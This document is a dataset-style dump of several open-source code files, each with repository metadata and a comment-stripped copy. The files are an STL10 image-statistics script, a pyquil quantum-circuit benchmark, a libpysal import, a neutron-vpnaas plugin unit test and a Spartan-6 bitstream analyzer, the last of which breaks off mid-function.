mean.reverse()
std.reverse()
print(mean)
print(std)
| 22.924528
| 64
| 0.635391
|
import numpy as np
import cv2
import os
mean = []
std = []
img_list = []
dir_path = './STL10-data/train'
class_paths = os.listdir(dir_path)
print(class_paths)
for cls in class_paths:
img_paths = os.listdir(dir_path + os.sep + cls)
print(len(img_paths))
for img_path in img_paths:
print(img_path)
img_path = dir_path + os.sep + cls + os.sep + img_path
img = cv2.imread(img_path, cv2.IMREAD_UNCHANGED)
        img = img[:, :, :, np.newaxis]
img_list.append(img)
imgs = np.concatenate(img_list, axis=3)
imgs = imgs.astype(np.float32) / 255.0
for i in range(3):
channel = imgs[:, :, i, :].ravel()
mean.append(np.mean(channel))
std.append(np.std(channel))
mean.reverse()
std.reverse()
print(mean)
print(std)
| true
| true
|
f70b63460b6e1920a8ab199d2d897323b063d66c
| 1,676
|
py
|
Python
|
benchmark/startPyquil1973.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startPyquil1973.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startPyquil1973.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=4
# total number=31
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit() -> Program:
prog = Program() # circuit begin
prog += X(3) # number=1
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += H(0) # number=5
prog += H(1) # number=6
prog += H(2) # number=7
prog += H(3) # number=8
prog += Y(1) # number=19
prog += H(0) # number=9
prog += Y(2) # number=10
prog += Y(2) # number=11
prog += Y(3) # number=20
prog += Y(1) # number=12
prog += RX(-2.158274153016188,3) # number=24
prog += H(0) # number=16
prog += CZ(2,0) # number=17
prog += H(0) # number=18
prog += CNOT(1,0) # number=21
prog += Z(1) # number=22
prog += H(0) # number=28
prog += CZ(1,0) # number=29
prog += H(0) # number=30
prog += H(0) # number=25
prog += CZ(2,0) # number=26
prog += H(0) # number=27
# circuit end
return prog
def summarise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
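# Illustrative example: summarise_results(['00', '01', '00']) -> {'00': 2, '01': 1}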
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil1973.csv","w")
    print(summarise_results(bitstrings), file=writefile)
writefile.close()
| 24.647059
| 64
| 0.569212
|
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit() -> Program:
prog = Program()
prog += X(3)
prog += H(1)
prog += H(2)
prog += H(3)
prog += H(0)
prog += H(1)
prog += H(2)
prog += H(3)
prog += Y(1)
prog += H(0)
prog += Y(2)
prog += Y(2)
prog += Y(3)
prog += Y(1)
prog += RX(-2.158274153016188,3)
prog += H(0)
prog += CZ(2,0)
prog += H(0)
prog += CNOT(1,0)
prog += Z(1)
prog += H(0)
prog += CZ(1,0)
prog += H(0)
prog += H(0)
prog += CZ(2,0)
prog += H(0)
return prog
def summarise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil1973.csv","w")
    print(summarise_results(bitstrings), file=writefile)
writefile.close()
| true
| true
|
f70b6484fd5c367040bd21c68df6b4ceaf51dcfa
| 42
|
py
|
Python
|
libpysal/io/geotable/__init__.py
|
Kanahiro/dbf-df-translator
|
6603ca1ac306203bf8c95e6545685c509324a438
|
[
"MIT"
] | null | null | null |
libpysal/io/geotable/__init__.py
|
Kanahiro/dbf-df-translator
|
6603ca1ac306203bf8c95e6545685c509324a438
|
[
"MIT"
] | null | null | null |
libpysal/io/geotable/__init__.py
|
Kanahiro/dbf-df-translator
|
6603ca1ac306203bf8c95e6545685c509324a438
|
[
"MIT"
] | null | null | null |
from .file import read_files, write_files
| 21
| 41
| 0.833333
|
from .file import read_files, write_files
| true
| true
|
f70b6582958899d7a3048c74fd9764f38a1ce5a8
| 7,444
|
py
|
Python
|
neutron_vpnaas/tests.skip/unit/services/vpn/test_vpnaas_driver_plugin.py
|
citrix-openstack-build/neutron-vpnaas
|
d1ee6923425eca52f400a2de23d1541f16568c2b
|
[
"Apache-2.0"
] | null | null | null |
neutron_vpnaas/tests.skip/unit/services/vpn/test_vpnaas_driver_plugin.py
|
citrix-openstack-build/neutron-vpnaas
|
d1ee6923425eca52f400a2de23d1541f16568c2b
|
[
"Apache-2.0"
] | null | null | null |
neutron_vpnaas/tests.skip/unit/services/vpn/test_vpnaas_driver_plugin.py
|
citrix-openstack-build/neutron-vpnaas
|
d1ee6923425eca52f400a2de23d1541f16568c2b
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2013, Nachi Ueno, NTT I3, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import mock
from neutron.common import constants
from neutron import context
from neutron import manager
from neutron.plugins.common import constants as p_constants
from neutron.tests.unit.db.vpn import test_db_vpnaas
from neutron.tests.unit.openvswitch import test_agent_scheduler
from neutron.tests.unit import test_agent_ext_plugin
from neutron_vpnaas.db.vpn import vpn_validator
from neutron_vpnaas.services.vpn.service_drivers import ipsec as ipsec_driver
FAKE_HOST = test_agent_ext_plugin.L3_HOSTA
VPN_DRIVER_CLASS = 'neutron.services.vpn.plugin.VPNDriverPlugin'
class TestVPNDriverPlugin(test_db_vpnaas.TestVpnaas,
test_agent_scheduler.AgentSchedulerTestMixIn,
test_agent_ext_plugin.AgentDBTestMixIn):
def setUp(self):
self.adminContext = context.get_admin_context()
driver_cls_p = mock.patch(
'neutron.services.vpn.'
'service_drivers.ipsec.IPsecVPNDriver')
driver_cls = driver_cls_p.start()
self.driver = mock.Mock()
self.driver.service_type = ipsec_driver.IPSEC
self.driver.validator = vpn_validator.VpnReferenceValidator()
driver_cls.return_value = self.driver
super(TestVPNDriverPlugin, self).setUp(
vpnaas_plugin=VPN_DRIVER_CLASS)
def test_create_ipsec_site_connection(self, **extras):
super(TestVPNDriverPlugin, self).test_create_ipsec_site_connection()
self.driver.create_ipsec_site_connection.assert_called_once_with(
mock.ANY, mock.ANY)
self.driver.delete_ipsec_site_connection.assert_called_once_with(
mock.ANY, mock.ANY)
def test_delete_vpnservice(self, **extras):
super(TestVPNDriverPlugin, self).test_delete_vpnservice()
self.driver.delete_vpnservice.assert_called_once_with(
mock.ANY, mock.ANY)
def test_update_vpnservice(self, **extras):
super(TestVPNDriverPlugin, self).test_update_vpnservice()
self.driver.update_vpnservice.assert_called_once_with(
mock.ANY, mock.ANY, mock.ANY)
@contextlib.contextmanager
def vpnservice_set(self):
"""Test case to create a ipsec_site_connection."""
vpnservice_name = "vpn1"
ipsec_site_connection_name = "ipsec_site_connection"
ikename = "ikepolicy1"
ipsecname = "ipsecpolicy1"
description = "my-vpn-connection"
keys = {'name': vpnservice_name,
'description': "my-vpn-connection",
'peer_address': '192.168.1.10',
'peer_id': '192.168.1.10',
'peer_cidrs': ['192.168.2.0/24', '192.168.3.0/24'],
'initiator': 'bi-directional',
'mtu': 1500,
'dpd_action': 'hold',
'dpd_interval': 40,
'dpd_timeout': 120,
'tenant_id': self._tenant_id,
'psk': 'abcd',
'status': 'PENDING_CREATE',
'admin_state_up': True}
with self.ikepolicy(name=ikename) as ikepolicy:
with self.ipsecpolicy(name=ipsecname) as ipsecpolicy:
with self.subnet() as subnet:
with self.router() as router:
plugin = manager.NeutronManager.get_plugin()
agent = {'host': FAKE_HOST,
'agent_type': constants.AGENT_TYPE_L3,
'binary': 'fake-binary',
'topic': 'fake-topic'}
plugin.create_or_update_agent(self.adminContext, agent)
plugin.schedule_router(
self.adminContext, router['router']['id'])
with self.vpnservice(name=vpnservice_name,
subnet=subnet,
router=router) as vpnservice1:
keys['ikepolicy_id'] = ikepolicy['ikepolicy']['id']
keys['ipsecpolicy_id'] = (
ipsecpolicy['ipsecpolicy']['id']
)
keys['vpnservice_id'] = (
vpnservice1['vpnservice']['id']
)
with self.ipsec_site_connection(
self.fmt,
ipsec_site_connection_name,
keys['peer_address'],
keys['peer_id'],
keys['peer_cidrs'],
keys['mtu'],
keys['psk'],
keys['initiator'],
keys['dpd_action'],
keys['dpd_interval'],
keys['dpd_timeout'],
vpnservice1,
ikepolicy,
ipsecpolicy,
keys['admin_state_up'],
description=description,
):
yield vpnservice1['vpnservice']
def test_get_agent_hosting_vpn_services(self):
with self.vpnservice_set():
service_plugin = manager.NeutronManager.get_service_plugins()[
p_constants.VPN]
vpnservices = service_plugin._get_agent_hosting_vpn_services(
self.adminContext, FAKE_HOST)
vpnservices = vpnservices.all()
self.assertEqual(1, len(vpnservices))
vpnservice_db = vpnservices[0]
self.assertEqual(1, len(vpnservice_db.ipsec_site_connections))
ipsec_site_connection = vpnservice_db.ipsec_site_connections[0]
self.assertIsNotNone(
ipsec_site_connection['ikepolicy'])
self.assertIsNotNone(
ipsec_site_connection['ipsecpolicy'])
def test_update_status(self):
with self.vpnservice_set() as vpnservice:
self._register_agent_states()
service_plugin = manager.NeutronManager.get_service_plugins()[
p_constants.VPN]
service_plugin.update_status_by_agent(
self.adminContext,
[{'status': 'ACTIVE',
'ipsec_site_connections': {},
'updated_pending_status': True,
'id': vpnservice['id']}])
vpnservices = service_plugin._get_agent_hosting_vpn_services(
self.adminContext, FAKE_HOST)
vpnservice_db = vpnservices[0]
self.assertEqual(p_constants.ACTIVE, vpnservice_db['status'])
| 45.950617
| 79
| 0.569183
|
import contextlib
import mock
from neutron.common import constants
from neutron import context
from neutron import manager
from neutron.plugins.common import constants as p_constants
from neutron.tests.unit.db.vpn import test_db_vpnaas
from neutron.tests.unit.openvswitch import test_agent_scheduler
from neutron.tests.unit import test_agent_ext_plugin
from neutron_vpnaas.db.vpn import vpn_validator
from neutron_vpnaas.services.vpn.service_drivers import ipsec as ipsec_driver
FAKE_HOST = test_agent_ext_plugin.L3_HOSTA
VPN_DRIVER_CLASS = 'neutron.services.vpn.plugin.VPNDriverPlugin'
class TestVPNDriverPlugin(test_db_vpnaas.TestVpnaas,
test_agent_scheduler.AgentSchedulerTestMixIn,
test_agent_ext_plugin.AgentDBTestMixIn):
def setUp(self):
self.adminContext = context.get_admin_context()
driver_cls_p = mock.patch(
'neutron.services.vpn.'
'service_drivers.ipsec.IPsecVPNDriver')
driver_cls = driver_cls_p.start()
self.driver = mock.Mock()
self.driver.service_type = ipsec_driver.IPSEC
self.driver.validator = vpn_validator.VpnReferenceValidator()
driver_cls.return_value = self.driver
super(TestVPNDriverPlugin, self).setUp(
vpnaas_plugin=VPN_DRIVER_CLASS)
def test_create_ipsec_site_connection(self, **extras):
super(TestVPNDriverPlugin, self).test_create_ipsec_site_connection()
self.driver.create_ipsec_site_connection.assert_called_once_with(
mock.ANY, mock.ANY)
self.driver.delete_ipsec_site_connection.assert_called_once_with(
mock.ANY, mock.ANY)
def test_delete_vpnservice(self, **extras):
super(TestVPNDriverPlugin, self).test_delete_vpnservice()
self.driver.delete_vpnservice.assert_called_once_with(
mock.ANY, mock.ANY)
def test_update_vpnservice(self, **extras):
super(TestVPNDriverPlugin, self).test_update_vpnservice()
self.driver.update_vpnservice.assert_called_once_with(
mock.ANY, mock.ANY, mock.ANY)
@contextlib.contextmanager
def vpnservice_set(self):
vpnservice_name = "vpn1"
ipsec_site_connection_name = "ipsec_site_connection"
ikename = "ikepolicy1"
ipsecname = "ipsecpolicy1"
description = "my-vpn-connection"
keys = {'name': vpnservice_name,
'description': "my-vpn-connection",
'peer_address': '192.168.1.10',
'peer_id': '192.168.1.10',
'peer_cidrs': ['192.168.2.0/24', '192.168.3.0/24'],
'initiator': 'bi-directional',
'mtu': 1500,
'dpd_action': 'hold',
'dpd_interval': 40,
'dpd_timeout': 120,
'tenant_id': self._tenant_id,
'psk': 'abcd',
'status': 'PENDING_CREATE',
'admin_state_up': True}
with self.ikepolicy(name=ikename) as ikepolicy:
with self.ipsecpolicy(name=ipsecname) as ipsecpolicy:
with self.subnet() as subnet:
with self.router() as router:
plugin = manager.NeutronManager.get_plugin()
agent = {'host': FAKE_HOST,
'agent_type': constants.AGENT_TYPE_L3,
'binary': 'fake-binary',
'topic': 'fake-topic'}
plugin.create_or_update_agent(self.adminContext, agent)
plugin.schedule_router(
self.adminContext, router['router']['id'])
with self.vpnservice(name=vpnservice_name,
subnet=subnet,
router=router) as vpnservice1:
keys['ikepolicy_id'] = ikepolicy['ikepolicy']['id']
keys['ipsecpolicy_id'] = (
ipsecpolicy['ipsecpolicy']['id']
)
keys['vpnservice_id'] = (
vpnservice1['vpnservice']['id']
)
with self.ipsec_site_connection(
self.fmt,
ipsec_site_connection_name,
keys['peer_address'],
keys['peer_id'],
keys['peer_cidrs'],
keys['mtu'],
keys['psk'],
keys['initiator'],
keys['dpd_action'],
keys['dpd_interval'],
keys['dpd_timeout'],
vpnservice1,
ikepolicy,
ipsecpolicy,
keys['admin_state_up'],
description=description,
):
yield vpnservice1['vpnservice']
def test_get_agent_hosting_vpn_services(self):
with self.vpnservice_set():
service_plugin = manager.NeutronManager.get_service_plugins()[
p_constants.VPN]
vpnservices = service_plugin._get_agent_hosting_vpn_services(
self.adminContext, FAKE_HOST)
vpnservices = vpnservices.all()
self.assertEqual(1, len(vpnservices))
vpnservice_db = vpnservices[0]
self.assertEqual(1, len(vpnservice_db.ipsec_site_connections))
ipsec_site_connection = vpnservice_db.ipsec_site_connections[0]
self.assertIsNotNone(
ipsec_site_connection['ikepolicy'])
self.assertIsNotNone(
ipsec_site_connection['ipsecpolicy'])
def test_update_status(self):
with self.vpnservice_set() as vpnservice:
self._register_agent_states()
service_plugin = manager.NeutronManager.get_service_plugins()[
p_constants.VPN]
service_plugin.update_status_by_agent(
self.adminContext,
[{'status': 'ACTIVE',
'ipsec_site_connections': {},
'updated_pending_status': True,
'id': vpnservice['id']}])
vpnservices = service_plugin._get_agent_hosting_vpn_services(
self.adminContext, FAKE_HOST)
vpnservice_db = vpnservices[0]
self.assertEqual(p_constants.ACTIVE, vpnservice_db['status'])
| true
| true
|
f70b65d7b3654b248db969d72b0a41b9332d19db
| 14,122
|
py
|
Python
|
utils/sp6_bitstream_analyzer.py
|
rw1nkler/prjxray
|
aff076b47dcf6d653eb3ce791b41fd6cf4343edd
|
[
"ISC"
] | 583
|
2017-12-21T11:06:13.000Z
|
2022-02-20T21:27:33.000Z
|
utils/sp6_bitstream_analyzer.py
|
rw1nkler/prjxray
|
aff076b47dcf6d653eb3ce791b41fd6cf4343edd
|
[
"ISC"
] | 1,212
|
2017-12-22T15:05:06.000Z
|
2022-02-19T13:04:59.000Z
|
utils/sp6_bitstream_analyzer.py
|
mfkiwl/prjxray-xilinx-7-bitstream-fortmat
|
5349556bc2c230801d6df0cf11bccb9cfd171639
|
[
"ISC"
] | 134
|
2017-12-21T10:16:50.000Z
|
2022-02-16T06:42:04.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017-2020 The Project X-Ray Authors.
#
# Use of this source code is governed by a ISC-style
# license that can be found in the LICENSE file or at
# https://opensource.org/licenses/ISC
#
# SPDX-License-Identifier: ISC
'''
Spartan 6 bitstream analyzer tool.
This script parses a Spartan-6 bitstream and prints the configuration packets
and register writes it contains.
It can also create a frames file with the configuration data words.
The bitstream is analyzed word by word and interpreted according to
the UG380 Configuration User Guide.
The tool can be used to derive the initialization, startup and finalization
sequence as well as the configuration data. The latter is written to a frames
file which can be used by the bitstream tools such as frames2bit to generate
a valid bitstream.
'''
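# Example invocation (hypothetical file names):
#   python3 sp6_bitstream_analyzer.py --bitstream design.bit --frames_out design.frames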
import argparse
from io import StringIO
conf_regs = {
0: "CRC",
1: "FAR_MAJ",
2: "FAR_MIN",
3: "FDRI",
4: "FDRO",
5: "CMD",
6: "CTL",
7: "MASK",
8: "STAT",
9: "LOUT",
10: "COR1",
11: "COR2",
12: "PWRDN_REG",
13: "FLR",
14: "IDCODE",
15: "CWDT",
16: "HC_OPT_REG",
18: "CSBO",
19: "GENERAL1",
20: "GENERAL2",
21: "GENERAL3",
22: "GENERAL4",
23: "GENERAL5",
24: "MODE_REG",
25: "PU_GWE",
26: "PU_GTS",
27: "MFWR",
28: "CCLK_FREQ",
29: "SEU_OPT",
30: "EXP_SIGN",
31: "RDBK_SIGN",
32: "BOOTSTS",
33: "EYE_MASK",
34: "CBC_REG"
}
cmd_reg_codes = {
0: "NULL",
1: "WCFG",
2: "MFW",
3: "LFRM",
4: "RCFG",
5: "START",
7: "RCRC",
8: "AGHIGH",
10: "GRESTORE",
11: "SHUTDOWN",
13: "DESYNC",
14: "IPROG"
}
opcodes = ("NOP", "READ", "WRITE", "UNKNOWN")
def KnuthMorrisPratt(text, pattern):
    '''
    Yields all starting positions of copies of the pattern in the text.
    Calling conventions are similar to string.find, but its arguments can be
    lists or iterators, not just strings; it returns all matches, not just
    the first one; and it does not need the whole text in memory at once.
    Whenever it yields, it will have read the text exactly up to and including
    the match that caused the yield.
    '''
# allow indexing into pattern and protect against change during yield
pattern = list(pattern)
# build table of shift amounts
shifts = [1] * (len(pattern) + 1)
shift = 1
for pos in range(len(pattern)):
while shift <= pos and pattern[pos] != pattern[pos - shift]:
shift += shifts[pos - shift]
shifts[pos + 1] = shift
# do the actual search
startPos = 0
matchLen = 0
for c in text:
while matchLen == len(pattern) or \
matchLen >= 0 and pattern[matchLen] != c:
startPos += shifts[matchLen]
matchLen -= shifts[matchLen]
matchLen += 1
if matchLen == len(pattern):
yield startPos
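# Illustrative example: list(KnuthMorrisPratt('abcabc', 'abc')) yields [0, 3].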
class Bitstream:
def __init__(self, file_name, verbose=False):
self.frame_data = []
self.idcode = 0
self.exp_sign = 0
self.far_min = 0
self.far_maj = 0
self.curr_fdri_write_len = 0
self.curr_crc_check = 0
self.fdri_in_progress = False
with open(file_name, "rb") as f:
self.bytes = f.read()
pos, self.header = self.get_header()
self.body = [
(i << 8) | j
for i, j in zip(self.bytes[pos::2], self.bytes[pos + 1::2])
]
self.parse_bitstream(verbose)
def get_header(self):
pos = next(KnuthMorrisPratt(self.bytes, [0xaa, 0x99, 0x55, 0x66]))
return pos + 4, self.bytes[:pos + 4]
def parse_bitstream(self, verbose):
payload_len = 0
for word in self.body:
if payload_len > 0:
if verbose:
print("\tWord: ", hex(word))
payload_len = self.parse_reg(
reg_addr, word, payload_len, verbose)
continue
else:
packet_header = self.parse_packet_header(word)
opcode = packet_header["opcode"]
reg_addr = packet_header["reg_addr"]
words = packet_header["word_count"]
type = packet_header["type"]
if verbose:
print(
"\tWord: ", hex(word),
'Type: {}, Op: {}, Addr: {}, Words: {}'.format(
type, opcodes[opcode], reg_addr, words))
if opcode and reg_addr in conf_regs:
payload_len = words
continue
def parse_packet_header(self, word):
type = (word >> 13) & 0x7
opcode = (word >> 11) & 0x3
reg_addr = (word >> 5) & 0x3F
if type == 1:
word_count = word & 0x1F
elif type == 2:
word_count = 2
else:
word_count = 0
return {
"type": type,
"opcode": opcode,
"reg_addr": reg_addr,
"word_count": word_count
}
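    # Worked example (illustrative): word 0x30A1 decodes as a type-1 packet,
    # opcode 2 (WRITE) to register 5 (CMD) with a word count of 1.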
def parse_command(self, word):
return cmd_reg_codes[word]
def parse_cor1(self, word):
return word
def parse_cor2(self, word):
return word
def parse_ctl(self, word):
        # decryption
        dec = (word >> 6) & 1
        # security bits
        sb = (word >> 4) & 3
        # persist
        p = (word >> 3) & 1
        # use efuse
        efuse = (word >> 2) & 1
        # crc extstat disable
        crc = (word >> 1) & 1
return {
"decryption": dec,
"security bits": sb,
"pesist": p,
"use efuse": efuse,
"crc extstat disable": crc
}
def parse_cclk_freq(self, word):
ext_mclk = (word >> 14) & 1
mclk_freq = word & 0x3FF
return (ext_mclk, mclk_freq)
def parse_pwrdn(self, word):
en_eyes = (word >> 14) & 1
filter_b = (word >> 5) & 1
en_pgsr = (word >> 4) & 1
en_pwrdn = (word >> 2) & 1
keep_sclk = word & 1
return {
"en_eyes": en_eyes,
"filter_b": filter_b,
"en_pgsr": en_pgsr,
"en_pwrdn": en_pwrdn,
"keep_sclk": keep_sclk
}
def parse_eye_mask(self, word):
return word & 0xFF
def parse_hc_opt(self, word):
return (word >> 6) & 1
def parse_cwdt(self, word):
return word
def parse_pu_gwe(self, word):
return word & 0x3FF
def parse_pu_gts(self, word):
return word & 0x3FF
def parse_mode(self, word):
new_mode = (word >> 13) & 0x1
buswidth = (word >> 11) & 0x3
bootmode = (word >> 8) & 0x7
bootvsel = word & 0xFF
return {
"new_mode": new_mode,
"buswidth": buswidth,
"bootmode": bootmode,
"bootvsel": bootvsel
}
def parse_seu(self, word):
seu_freq = (word >> 4) & 0x3FF
seu_run_on_err = (word >> 3) & 0x1
glut_mask = (word >> 1) & 0x1
seu_enable = word & 0x1
return {
"seu_freq": seu_freq,
"seu_run_on_err": seu_run_on_err,
"glut_mask": glut_mask,
"seu_enable": seu_enable
}
def parse_reg(self, reg_addr, word, payload_len, verbose):
reg = conf_regs[reg_addr]
if reg == "CMD":
command = self.parse_command(word)
if verbose:
print("Command: {}\n".format(command))
elif reg == "FLR":
frame_length = word
if verbose:
print("Frame length: {}\n".format(frame_length))
elif reg == "COR1":
conf_options = self.parse_cor1(word)
if verbose:
print("COR1 options: {}\n".format(conf_options))
elif reg == "COR2":
conf_options = self.parse_cor2(word)
if verbose:
print("COR2 options: {}\n".format(conf_options))
elif reg == "IDCODE":
assert payload_len < 3
if payload_len == 2:
self.idcode = word << 16
elif payload_len == 1:
self.idcode |= word
if verbose:
print("IDCODE: {}\n".format(hex(self.idcode)))
elif reg == "MASK":
mask = word
if verbose:
print("Mask value: {}\n".format(mask))
elif reg == "CTL":
ctl_options = self.parse_ctl(word)
if verbose:
print("CTL options: {}\n".format(ctl_options))
elif reg == "CCLK_FREQ":
cclk_freq_options = self.parse_cclk_freq(word)
if verbose:
print("CCLK_FREQ options: {}\n".format(cclk_freq_options))
elif reg == "PWRDN_REG":
suspend_reg_options = self.parse_pwrdn(word)
if verbose:
print("{} options: {}\n".format(reg, suspend_reg_options))
elif reg == "EYE_MASK":
eye_mask = self.parse_eye_mask(word)
if verbose:
print("{} options: {}\n".format(reg, eye_mask))
elif reg == "HC_OPT_REG":
hc_options = self.parse_hc_opt(word)
if verbose:
print("{} options: {}\n".format(reg, hc_options))
elif reg == "CWDT":
cwdt_options = self.parse_cwdt(word)
if verbose:
print("{} options: {}\n".format(reg, cwdt_options))
elif reg == "PU_GWE":
pu_gwe_sequence = self.parse_pu_gwe(word)
if verbose:
print("{} options: {}\n".format(reg, pu_gwe_sequence))
elif reg == "PU_GTS":
pu_gts_sequence = self.parse_pu_gts(word)
if verbose:
print("{} options: {}\n".format(reg, pu_gts_sequence))
elif reg == "MODE_REG":
mode_options = self.parse_mode(word)
if verbose:
print("{} options: {}\n".format(reg, mode_options))
elif reg == "GENERAL1" or reg == "GENERAL2" \
or reg == "GENERAL3" or reg == "GENERAL4" \
or reg == "GENERAL5":
general_options = word
if verbose:
print("{} options: {}\n".format(reg, general_options))
elif reg == "SEU_OPT":
seu_options = self.parse_seu(word)
if verbose:
print("{} options: {}\n".format(reg, seu_options))
elif reg == "EXP_SIGN":
if payload_len == 2:
self.exp_sign = word << 16
elif payload_len == 1:
self.exp_sign |= word
if verbose:
print("{}: {}\n".format(reg, self.exp_sign))
elif reg == "FAR_MAJ":
if payload_len == 2:
self.current_far_maj = word
elif payload_len == 1:
self.current_far_min = word
if verbose:
print(
"{}: {} FAR_MIN: {}\n".format(
reg, self.far_maj, self.far_min))
elif reg == "FDRI":
if self.fdri_in_progress:
self.frame_data.append(word)
if payload_len == 1:
self.fdri_in_progress = False
return 0
elif payload_len == 2:
self.curr_fdri_write_len = (word & 0xFFF) << 16
elif payload_len == 1:
self.curr_fdri_write_len |= word
self.fdri_in_progress = True
# Check if 0 words actually means read something
payload_len = self.curr_fdri_write_len + 2
if verbose:
print("{}: {}\n".format(reg, self.curr_fdri_write_len))
return payload_len
elif reg == "CRC":
if payload_len == 2:
self.curr_crc_check = (word & 0xFFF) << 16
elif payload_len == 1:
self.curr_crc_check |= word
if verbose:
print("{}: {}\n".format(reg, self.curr_crc_check))
payload_len -= 1
return payload_len
def write_frames_txt(self, file_name):
'''Write frame data in a more readable format'''
frame_stream = StringIO()
for i in range(len(self.frame_data)):
if i % 65 == 0:
frame_stream.write("\nFrame {:4}\n".format(i // 65))
            # IOB word
if i % 65 == 32:
frame_stream.write(
"\n#{:3}:{:6}\n".format(i % 65, hex(self.frame_data[i])))
else:
frame_stream.write(
"#{:3}:{:6},".format(i % 65, hex(self.frame_data[i])))
with open(file_name, "w") as f:
print(frame_stream.getvalue(), file=f)
def write_frames(self, file_name):
'''Write configuration data to frames file'''
frame_stream = StringIO()
for i in range(len(self.frame_data)):
if i % 65 == 0:
frame_stream.write("0x{:08x} ".format(i // 65))
frame_stream.write("0x{:04x}".format(self.frame_data[i]))
if i % 65 == 64:
frame_stream.write("\n")
elif i < len(self.frame_data) - 1:
frame_stream.write(",")
with open(file_name, "w") as f:
print(frame_stream.getvalue(), file=f)
def main(args):
verbose = not args.silent
bitstream = Bitstream(args.bitstream, verbose)
print("Frame data length: ", len(bitstream.frame_data))
if args.frames_out:
bitstream.write_frames(args.frames_out)
if verbose:
bitstream.write_frames_txt(args.frames_out + ".txt")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--bitstream', help='Input bitstream')
parser.add_argument('--frames_out', help='Output frames file')
parser.add_argument(
'--silent', help="Don't print analysis details", action='store_true')
args = parser.parse_args()
main(args)
| 32.539171
| 78
| 0.522518
|
import argparse
from io import StringIO
conf_regs = {
0: "CRC",
1: "FAR_MAJ",
2: "FAR_MIN",
3: "FDRI",
4: "FDRO",
5: "CMD",
6: "CTL",
7: "MASK",
8: "STAT",
9: "LOUT",
10: "COR1",
11: "COR2",
12: "PWRDN_REG",
13: "FLR",
14: "IDCODE",
15: "CWDT",
16: "HC_OPT_REG",
18: "CSBO",
19: "GENERAL1",
20: "GENERAL2",
21: "GENERAL3",
22: "GENERAL4",
23: "GENERAL5",
24: "MODE_REG",
25: "PU_GWE",
26: "PU_GTS",
27: "MFWR",
28: "CCLK_FREQ",
29: "SEU_OPT",
30: "EXP_SIGN",
31: "RDBK_SIGN",
32: "BOOTSTS",
33: "EYE_MASK",
34: "CBC_REG"
}
cmd_reg_codes = {
0: "NULL",
1: "WCFG",
2: "MFW",
3: "LFRM",
4: "RCFG",
5: "START",
7: "RCRC",
8: "AGHIGH",
10: "GRESTORE",
11: "SHUTDOWN",
13: "DESYNC",
14: "IPROG"
}
opcodes = ("NOP", "READ", "WRITE", "UNKNOWN")
def KnuthMorrisPratt(text, pattern):
pattern = list(pattern)
shifts = [1] * (len(pattern) + 1)
shift = 1
for pos in range(len(pattern)):
while shift <= pos and pattern[pos] != pattern[pos - shift]:
shift += shifts[pos - shift]
shifts[pos + 1] = shift
startPos = 0
matchLen = 0
for c in text:
while matchLen == len(pattern) or \
matchLen >= 0 and pattern[matchLen] != c:
startPos += shifts[matchLen]
matchLen -= shifts[matchLen]
matchLen += 1
if matchLen == len(pattern):
yield startPos
class Bitstream:
def __init__(self, file_name, verbose=False):
self.frame_data = []
self.idcode = 0
self.exp_sign = 0
self.far_min = 0
self.far_maj = 0
self.curr_fdri_write_len = 0
self.curr_crc_check = 0
self.fdri_in_progress = False
with open(file_name, "rb") as f:
self.bytes = f.read()
pos, self.header = self.get_header()
self.body = [
(i << 8) | j
for i, j in zip(self.bytes[pos::2], self.bytes[pos + 1::2])
]
self.parse_bitstream(verbose)
def get_header(self):
pos = next(KnuthMorrisPratt(self.bytes, [0xaa, 0x99, 0x55, 0x66]))
return pos + 4, self.bytes[:pos + 4]
def parse_bitstream(self, verbose):
payload_len = 0
for word in self.body:
if payload_len > 0:
if verbose:
print("\tWord: ", hex(word))
payload_len = self.parse_reg(
reg_addr, word, payload_len, verbose)
continue
else:
packet_header = self.parse_packet_header(word)
opcode = packet_header["opcode"]
reg_addr = packet_header["reg_addr"]
words = packet_header["word_count"]
type = packet_header["type"]
if verbose:
print(
"\tWord: ", hex(word),
'Type: {}, Op: {}, Addr: {}, Words: {}'.format(
type, opcodes[opcode], reg_addr, words))
if opcode and reg_addr in conf_regs:
payload_len = words
continue
def parse_packet_header(self, word):
type = (word >> 13) & 0x7
opcode = (word >> 11) & 0x3
reg_addr = (word >> 5) & 0x3F
if type == 1:
word_count = word & 0x1F
elif type == 2:
word_count = 2
else:
word_count = 0
return {
"type": type,
"opcode": opcode,
"reg_addr": reg_addr,
